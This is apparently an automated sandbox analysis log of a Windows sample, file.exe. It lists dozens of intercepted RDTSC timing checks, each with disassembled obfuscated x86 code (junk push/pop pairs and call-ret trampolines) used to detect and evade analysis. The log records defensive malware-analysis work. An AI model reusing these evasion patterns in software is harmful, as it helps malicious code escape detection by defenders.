Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F6051 second address: 9F60EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FE9A9298656h 0x00000009 jmp 00007FE9A9298669h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FE9A9298658h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Dh 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c mov edi, dword ptr [ebp+122D3B02h] 0x00000032 push 00000000h 0x00000034 pushad 0x00000035 mov eax, dword ptr [ebp+122D3AE2h] 0x0000003b jg 00007FE9A929865Ch 0x00000041 popad 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ecx 0x00000047 call 00007FE9A9298658h 0x0000004c pop ecx 0x0000004d mov dword ptr [esp+04h], ecx 0x00000051 add dword ptr [esp+04h], 0000001Ah 0x00000059 inc ecx 0x0000005a push ecx 0x0000005b ret 0x0000005c pop ecx 0x0000005d ret 0x0000005e mov si, EB23h 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jp 00007FE9A9298658h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F84AB second address: 9F84B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F9FF3 second address: 9FA005 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FE9A929865Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FA005 second address: 9FA058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 js 00007FE9A87AE1E6h 0x0000000d jmp 00007FE9A87AE1F6h 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE9A87AE1F5h 0x0000001c jmp 00007FE9A87AE1F6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FA6CC second address: 9FA6F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A929865Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE9A9298668h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FA6F7 second address: 9FA6FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FAE9E second address: 9FAEA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FE9A9298656h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FBAB3 second address: 9FBB24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jne 00007FE9A87AE1F2h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007FE9A87AE1E8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e mov esi, ecx 0x00000030 jmp 00007FE9A87AE1ECh 0x00000035 push 00000000h 0x00000037 or dword ptr [ebp+122D17F8h], esi 0x0000003d push eax 0x0000003e pushad 0x0000003f push edi 0x00000040 pushad 0x00000041 popad 0x00000042 pop edi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FBB24 second address: 9FBB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FB8F6 second address: 9FB8FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FBB28 second address: 9FBB2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FF813 second address: 9FF833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9A87AE1F6h 0x00000009 jnc 00007FE9A87AE1E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FF833 second address: 9FF837 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB1B4 second address: 9BB1C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FE9A87AE1EAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB1C8 second address: 9BB1CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00ACC second address: A00B64 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE9A87AE1ECh 0x00000008 jns 00007FE9A87AE1E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push esi 0x00000012 push edx 0x00000013 mov ebx, 65C1AC96h 0x00000018 pop edi 0x00000019 pop ebx 0x0000001a push dword ptr fs:[00000000h] 0x00000021 pushad 0x00000022 sub dword ptr [ebp+12455936h], ebx 0x00000028 sbb di, 2821h 0x0000002d popad 0x0000002e mov dword ptr fs:[00000000h], esp 0x00000035 xor dword ptr [ebp+1244EF36h], eax 0x0000003b mov eax, dword ptr [ebp+122D118Dh] 0x00000041 push 00000000h 0x00000043 push edx 0x00000044 call 00007FE9A87AE1E8h 0x00000049 pop edx 0x0000004a mov dword ptr [esp+04h], edx 0x0000004e add dword ptr [esp+04h], 00000016h 0x00000056 inc edx 0x00000057 push edx 0x00000058 ret 0x00000059 pop edx 0x0000005a ret 0x0000005b mov ebx, dword ptr [ebp+122D304Ch] 0x00000061 or di, D797h 0x00000066 push FFFFFFFFh 0x00000068 mov ebx, esi 0x0000006a push eax 0x0000006b pushad 0x0000006c jmp 00007FE9A87AE1F6h 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007FE9A87AE1F0h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A01940 second address: A01945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A00B64 second address: A00B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A056BD second address: A056C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A039B0 second address: A039BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007FE9A87AE1E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A01945 second address: A019B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A929865Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007FE9A9298658h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2A10h], eax 0x0000002c push dword ptr fs:[00000000h] 0x00000033 add ebx, dword ptr [ebp+122D34B3h] 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov ebx, dword ptr [ebp+122D35DDh] 0x00000046 clc 0x00000047 mov eax, dword ptr [ebp+122D0125h] 0x0000004d sub dword ptr [ebp+122D35DDh], eax 0x00000053 push FFFFFFFFh 0x00000055 push ecx 0x00000056 mov bl, 1Bh 0x00000058 pop ebx 0x00000059 cld 0x0000005a nop 0x0000005b pushad 0x0000005c push edi 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A056C1 second address: A056D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE9A87AE1EDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A056D7 second address: A0573F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jno 00007FE9A9298662h 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D3522h], edi 0x00000014 push 00000000h 0x00000016 or edi, dword ptr [ebp+122D3992h] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007FE9A9298658h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 xor ebx, dword ptr [ebp+122D18CFh] 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FE9A9298669h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0573F second address: A05745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05745 second address: A05749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05749 second address: A05766 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE9A87AE1E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE9A87AE1EEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05899 second address: A058CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A9298669h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE9A9298661h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05992 second address: A059BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE9A87AE1F1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0756C second address: A0758D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A9298667h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0679B second address: A067AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FE9A87AE1E8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A085B9 second address: A085BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A085BD second address: A085EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a adc di, 475Ch 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 xor edi, dword ptr [ebp+122D386Ah] 0x00000019 add edi, dword ptr [ebp+122D3B7Eh] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FE9A87AE1EBh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0A623 second address: A0A629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0A629 second address: A0A6B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jng 00007FE9A87AE1ECh 0x00000011 add edi, dword ptr [ebp+122D304Ch] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FE9A87AE1E8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 mov dword ptr [ebp+124552DAh], esi 0x00000039 pushad 0x0000003a jbe 00007FE9A87AE1ECh 0x00000040 mov edi, dword ptr [ebp+12455A74h] 0x00000046 mov esi, 18966D33h 0x0000004b popad 0x0000004c push 00000000h 0x0000004e push 00000000h 0x00000050 push esi 0x00000051 call 00007FE9A87AE1E8h 0x00000056 pop esi 0x00000057 mov dword ptr [esp+04h], esi 0x0000005b add dword ptr [esp+04h], 0000001Ah 0x00000063 inc esi 0x00000064 push esi 0x00000065 ret 0x00000066 pop esi 0x00000067 ret 0x00000068 mov bh, 54h 0x0000006a xchg eax, esi 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e pushad 0x0000006f popad 0x00000070 jo 00007FE9A87AE1E6h 0x00000076 popad 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0A6B1 second address: A0A6D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007FE9A9298666h 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B74D second address: A0B778 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FE9A87AE1E6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE9A87AE1F9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B8B4 second address: A0B8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B8B8 second address: A0B8BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0E771 second address: A0E7E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jno 00007FE9A9298662h 0x0000000f nop 0x00000010 jne 00007FE9A929865Ch 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007FE9A9298658h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000015h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 sub bl, 00000065h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007FE9A9298658h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000019h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov di, ax 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 push ebx 0x0000005a pop ebx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0E7E8 second address: A0E7FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0E7FF second address: A0E804 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A086C8 second address: A0878D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add di, BAD2h 0x00000011 call 00007FE9A87AE1EFh 0x00000016 xor dword ptr [ebp+122D2901h], ecx 0x0000001c pop edi 0x0000001d push dword ptr fs:[00000000h] 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007FE9A87AE1E8h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e sub dword ptr [ebp+122D3052h], edi 0x00000044 mov dword ptr fs:[00000000h], esp 0x0000004b mov dword ptr [ebp+12481A39h], esi 0x00000051 mov di, cx 0x00000054 mov eax, dword ptr [ebp+122D0449h] 0x0000005a push 00000000h 0x0000005c push ebx 0x0000005d call 00007FE9A87AE1E8h 0x00000062 pop ebx 0x00000063 mov dword ptr [esp+04h], ebx 0x00000067 add dword ptr [esp+04h], 00000019h 0x0000006f inc ebx 0x00000070 push ebx 0x00000071 ret 0x00000072 pop ebx 0x00000073 ret 0x00000074 mov ebx, dword ptr [ebp+122D3608h] 0x0000007a push FFFFFFFFh 0x0000007c nop 0x0000007d jmp 00007FE9A87AE1F0h 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 jl 00007FE9A87AE1E8h 0x0000008b pushad 0x0000008c popad 0x0000008d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0878D second address: A0879D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9A929865Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C936 second address: A0C93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F8C4 second address: A0F8CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C93C second address: A0C94A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C94A second address: A0C94E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F8CA second address: A0F93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FE9A87AE1E8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D343Fh], edi 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007FE9A87AE1E8h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000017h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 jns 00007FE9A87AE1ECh 0x0000004d movsx ebx, di 0x00000050 push 00000000h 0x00000052 xor bh, FFFFFFADh 0x00000055 xchg eax, esi 0x00000056 push eax 0x00000057 push edx 0x00000058 jo 00007FE9A87AE1ECh 0x0000005e jp 00007FE9A87AE1E6h 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F93C second address: A0F953 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007FE9A929865Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F953 second address: A0F959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0F959 second address: A0F95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0DA01 second address: A0DA07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0DADC second address: A0DAE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13015 second address: A1301B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1301B second address: A13035 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE9A929865Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FE9A9298664h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A13035 second address: A1303B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1826B second address: A18271 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A18271 second address: A1828E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9A87AE1F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1828E second address: A18292 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1C903 second address: A1C90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1C90C second address: A1C91C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FE9A9298656h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1C91C second address: A1C938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9A87AE1F8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1C938 second address: A1C947 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push esi 0x0000000b pop esi 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1FD79 second address: A1FD97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FE9A87AE1F5h 0x0000000f jmp 00007FE9A87AE1EFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26B12 second address: A26B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26B18 second address: A26B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26B1C second address: A26B29 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE9A9298656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26B29 second address: A26B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FE9A87AE1F5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A26B49 second address: A26B5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FE9A9298656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
